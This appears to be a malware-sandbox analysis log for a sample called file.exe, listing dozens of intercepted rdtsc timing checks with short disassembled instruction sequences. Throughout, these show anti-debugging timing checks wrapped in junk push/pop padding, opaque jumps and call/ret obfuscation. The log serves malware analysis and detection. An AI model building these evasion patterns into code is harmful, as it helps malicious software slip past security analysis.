Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A77812 second address: A7781E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FA934C8B32Ch 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A82A8F second address: A82AA6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA9347D66C0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A78886 second address: A7888B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A7888B second address: A7892B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FA9347D66B6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e jmp 00007FA9347D66C8h 0x00000013 push dword ptr fs:[00000000h] 0x0000001a mov dword ptr fs:[00000000h], esp 0x00000021 push 00000000h 0x00000023 push esi 0x00000024 call 00007FA9347D66B8h 0x00000029 pop esi 0x0000002a mov dword ptr [esp+04h], esi 0x0000002e add dword ptr [esp+04h], 00000017h 0x00000036 inc esi 0x00000037 push esi 0x00000038 ret 0x00000039 pop esi 0x0000003a ret 0x0000003b mov eax, dword ptr [ebp+122D0165h] 0x00000041 and ebx, 5DF52F65h 0x00000047 push FFFFFFFFh 0x00000049 nop 0x0000004a pushad 0x0000004b jp 00007FA9347D66B8h 0x00000051 push esi 0x00000052 pop esi 0x00000053 jmp 00007FA9347D66C9h 0x00000058 popad 0x00000059 push eax 0x0000005a push eax 0x0000005b push edx 0x0000005c jmp 00007FA9347D66C8h 0x00000061 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A7A948 second address: A7A94E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A7DE3B second address: A7DE46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FA9347D66B6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A7EDC2 second address: A7EDE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FA934C8B326h 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FA934C8B337h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A7EDE7 second address: A7EDF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FA9347D66B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A88187 second address: A8818D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A8818D second address: A88191 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A80C95 second address: A80C99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A80C99 second address: A80C9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A80C9D second address: A80CA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A83D00 second address: A83D2C instructions: 0x00000000 rdtsc 0x00000002 jne 00007FA9347D66B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jbe 00007FA9347D66B6h 0x00000011 jmp 00007FA9347D66C3h 0x00000016 popad 0x00000017 popad 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b push ecx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A83D2C second address: A83D31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A80D62 second address: A80D69 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9197E second address: A91982 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A91982 second address: A91988 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A237A6 second address: A237B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FA934C8B326h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A288BC second address: A288C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A288C0 second address: A288C5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A288C5 second address: A288FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop esi 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jno 00007FA9347D66C2h 0x00000011 pushad 0x00000012 je 00007FA9347D66B6h 0x00000018 jp 00007FA9347D66B6h 0x0000001e jmp 00007FA9347D66BBh 0x00000023 pushad 0x00000024 popad 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9E86B second address: A9E87F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FA934C8B32Bh 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9E87F second address: A9E883 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9E883 second address: A9E894 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9E894 second address: A9E89A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9E89A second address: A9E8B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FA934C8B334h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9ED1B second address: A9ED5D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FA9347D66C7h 0x00000008 pop ebx 0x00000009 push ecx 0x0000000a pushad 0x0000000b popad 0x0000000c pop ecx 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jmp 00007FA9347D66C8h 0x00000015 js 00007FA9347D66BEh 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9EEAE second address: A9EEB3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9EEB3 second address: A9EEC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9F03B second address: A9F053 instructions: 0x00000000 rdtsc 0x00000002 je 00007FA934C8B326h 0x00000008 jmp 00007FA934C8B32Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9F053 second address: A9F05A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9F173 second address: A9F186 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FA934C8B326h 0x0000000a popad 0x0000000b ja 00007FA934C8B32Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9F186 second address: A9F1B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jg 00007FA9347D66CAh 0x0000000d jmp 00007FA9347D66C4h 0x00000012 jmp 00007FA9347D66BBh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9F1B2 second address: A9F1B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9F1B8 second address: A9F1D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA9347D66C9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A37A50 second address: A37A54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A37A54 second address: A37A75 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA9347D66BCh 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FA9347D66BDh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A37A75 second address: A37A8D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA934C8B334h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA32A1 second address: AA32C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA9347D66C1h 0x00000007 jmp 00007FA9347D66C2h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA32C8 second address: AA32D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA32D0 second address: AA32F7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007FA9347D66BDh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FA9347D66BCh 0x00000012 jno 00007FA9347D66B6h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA32F7 second address: AA330F instructions: 0x00000000 rdtsc 0x00000002 jo 00007FA934C8B326h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jnp 00007FA934C8B34Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA330F second address: AA3319 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FA9347D66B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA3319 second address: AA331D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA331D second address: AA3326 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA3326 second address: AA332C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA348B second address: AA34B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007FA9347D66B6h 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c jmp 00007FA9347D66C8h 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA34B6 second address: AA34C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push ecx 0x00000006 jns 00007FA934C8B326h 0x0000000c pop ecx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA3DC7 second address: AA3DE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 jmp 00007FA9347D66C8h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA3DE7 second address: AA3DED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA3DED second address: AA3E13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 jc 00007FA9347D66ECh 0x0000000c jmp 00007FA9347D66C7h 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA3F8B second address: AA3F93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA411F second address: AA4126 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA4126 second address: AA414F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jns 00007FA934C8B32Eh 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push edi 0x00000011 pop edi 0x00000012 jmp 00007FA934C8B32Dh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA414F second address: AA4154 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA4154 second address: AA415E instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FA934C8B32Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA415E second address: AA416C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jne 00007FA9347D66B6h 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA70FE second address: AA7104 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA7104 second address: AA710A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA710A second address: AA710F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AAAF46 second address: AAAF78 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FA9347D66D5h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b je 00007FA9347D66D0h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A73350 second address: A56939 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA934C8B331h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push eax 0x0000000e call 00007FA934C8B328h 0x00000013 pop eax 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 add dword ptr [esp+04h], 00000018h 0x00000020 inc eax 0x00000021 push eax 0x00000022 ret 0x00000023 pop eax 0x00000024 ret 0x00000025 push edx 0x00000026 xor edx, dword ptr [ebp+122D35F7h] 0x0000002c pop ecx 0x0000002d lea eax, dword ptr [ebp+1248811Bh] 0x00000033 mov edx, esi 0x00000035 push eax 0x00000036 jnp 00007FA934C8B32Ch 0x0000003c mov dword ptr [esp], eax 0x0000003f and edx, dword ptr [ebp+122D1844h] 0x00000045 call dword ptr [ebp+122D352Eh] 0x0000004b push eax 0x0000004c push edx 0x0000004d pushad 0x0000004e push eax 0x0000004f push edx 0x00000050 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A7398D second address: A73991 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A73991 second address: A739BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 push ebx 0x00000009 push edi 0x0000000a push eax 0x0000000b pop eax 0x0000000c pop edi 0x0000000d pop ebx 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FA934C8B339h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A73DE4 second address: A73DE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A73DE8 second address: A73DEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A73DEE second address: A73DFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA9347D66BAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A73DFC second address: A73E6C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA934C8B338h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c mov edx, dword ptr [ebp+122D2563h] 0x00000012 movzx ecx, cx 0x00000015 push 00000004h 0x00000017 push 00000000h 0x00000019 push edx 0x0000001a call 00007FA934C8B328h 0x0000001f pop edx 0x00000020 mov dword ptr [esp+04h], edx 0x00000024 add dword ptr [esp+04h], 0000001Ch 0x0000002c inc edx 0x0000002d push edx 0x0000002e ret 0x0000002f pop edx 0x00000030 ret 0x00000031 mov ecx, edx 0x00000033 nop 0x00000034 push eax 0x00000035 push edx 0x00000036 jc 00007FA934C8B33Dh 0x0000003c jmp 00007FA934C8B337h 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A73E6C second address: A73E72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A7413B second address: A74140 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A74140 second address: A74146 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A74146 second address: A7414A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A7414A second address: A7419F instructions: 0x00000000 rdtsc 0x00000002 jns 00007FA9347D66B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f xor edx, 7B78A10Ch 0x00000015 push 0000001Eh 0x00000017 push 00000000h 0x00000019 push edi 0x0000001a call 00007FA9347D66B8h 0x0000001f pop edi 0x00000020 mov dword ptr [esp+04h], edi 0x00000024 add dword ptr [esp+04h], 00000019h 0x0000002c inc edi 0x0000002d push edi 0x0000002e ret 0x0000002f pop edi 0x00000030 ret 0x00000031 nop 0x00000032 push ebx 0x00000033 push ecx 0x00000034 jmp 00007FA9347D66BAh 0x00000039 pop ecx 0x0000003a pop ebx 0x0000003b push eax 0x0000003c pushad 0x0000003d jbe 00007FA9347D66B8h 0x00000043 pushad 0x00000044 popad 0x00000045 push eax 0x00000046 push edx 0x00000047 push ecx 0x00000048 pop ecx 0x00000049 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A74353 second address: A74358 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A74358 second address: A7435D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A744F1 second address: A7450B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA934C8B32Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A7450B second address: A7452C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FA9347D66B6h 0x0000000a popad 0x0000000b pop edx 0x0000000c mov eax, dword ptr [eax] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FA9347D66BFh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A7452C second address: A74530 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A74530 second address: A74536 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A74536 second address: A7453C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A7453C second address: A7454E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pushad 0x00000010 popad 0x00000011 pop eax 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A74601 second address: A7460B instructions: 0x00000000 rdtsc 0x00000002 jne 00007FA934C8B326h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A57558 second address: A5759B instructions: 0x00000000 rdtsc 0x00000002 js 00007FA9347D66B6h 0x00000008 jmp 00007FA9347D66C7h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ecx 0x00000010 jbe 00007FA9347D66B6h 0x00000016 push esi 0x00000017 pop esi 0x00000018 pop ecx 0x00000019 push eax 0x0000001a js 00007FA9347D66B6h 0x00000020 pop eax 0x00000021 popad 0x00000022 jc 00007FA9347D66CAh 0x00000028 pushad 0x00000029 jnl 00007FA9347D66B6h 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AAF1C9 second address: AAF1D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007FA934C8B326h 0x00000009 push esi 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AAF1D6 second address: AAF1F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FA9347D66BBh 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 pop eax 0x00000011 jc 00007FA9347D66B6h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AAF1F3 second address: AAF1F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AAF4E4 second address: AAF4F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 je 00007FA9347D66B6h 0x0000000d jnl 00007FA9347D66B6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AAF77C second address: AAF784 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
